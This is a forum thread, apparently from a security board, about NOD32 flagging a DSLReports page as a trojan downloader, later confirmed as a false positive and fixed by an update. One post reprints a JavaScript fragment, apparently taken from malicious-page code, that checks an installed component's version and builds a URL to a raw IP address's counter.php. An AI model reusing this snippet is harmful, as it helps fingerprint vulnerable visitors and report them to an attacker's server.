Posting in this thread at DSLR Security forum:
http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

-{ Quote: "
Well, I got a warning from NOD32 on that thread:

hxxp://www2.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site~start=20
probably a variant of JS/TrojanDownloader.Agent.NFB trojan
" }-

The thread at the DSLR board on which NOD32 gives a warning, is this one:

hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

(I have changed http into hxxp)

That thread is two pages long on my machine and I get the warning on the second page.

I have already send an IM to Marcos here on the Wilders board.
I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
I hope that they will have a look at it after the weekend (please).

Maybe the following two screenshots are too big.

IMON warning

AMON warning

Do you suspect that the javascript detection is false positive ?

-{ Quote: "Do you suspect that the javascript detection is false positive ?" }-

Hi HiTech_boy,

Somehow that is indeed what I'm thinking.
I hardly can believe that there is a malware on the DSLR/BBR security forum.
The warning I am getting, is making me thinking of an heuristic detection.
I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
If I see any warning from NOD32 on a file, of course I would send it in in a password protected ZIP-file; but what to do in this case? That's why I have send Marcos an IM here at Wilders.

-{ Quote: "Do you suspect that the javascript detection is false positive ?" }-

There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

var i,l,v;
num = 2;
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) {
x = v.split(',');
if ( (x[0]!=0) && (x[2]<3810) ) {
num = 1;
}
}

c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;

Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags and save the file as test.html or whatever and watch NOD32 to quarantine it.

said by doktornotor:
-{ Quote: "
this gets triggered on the plaintext code listing there. Already been debated before with some other example:
" }-

Hi,

Where has this been debated before?

-{ Quote: "
Where has this been debated before?" }-

Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.

-{ Quote: "Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well." }-

OK, thanks for checking it !

Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).

As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.

Currently with update 3634 , I no longer see any alerts and I can browse the forum

-{ Quote: "Currently with update 3634 , I no longer see any alerts and I can browse the forum" }-

Yeah, looks good now. :thumb:

Yep, it's fixed :thumb:

Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !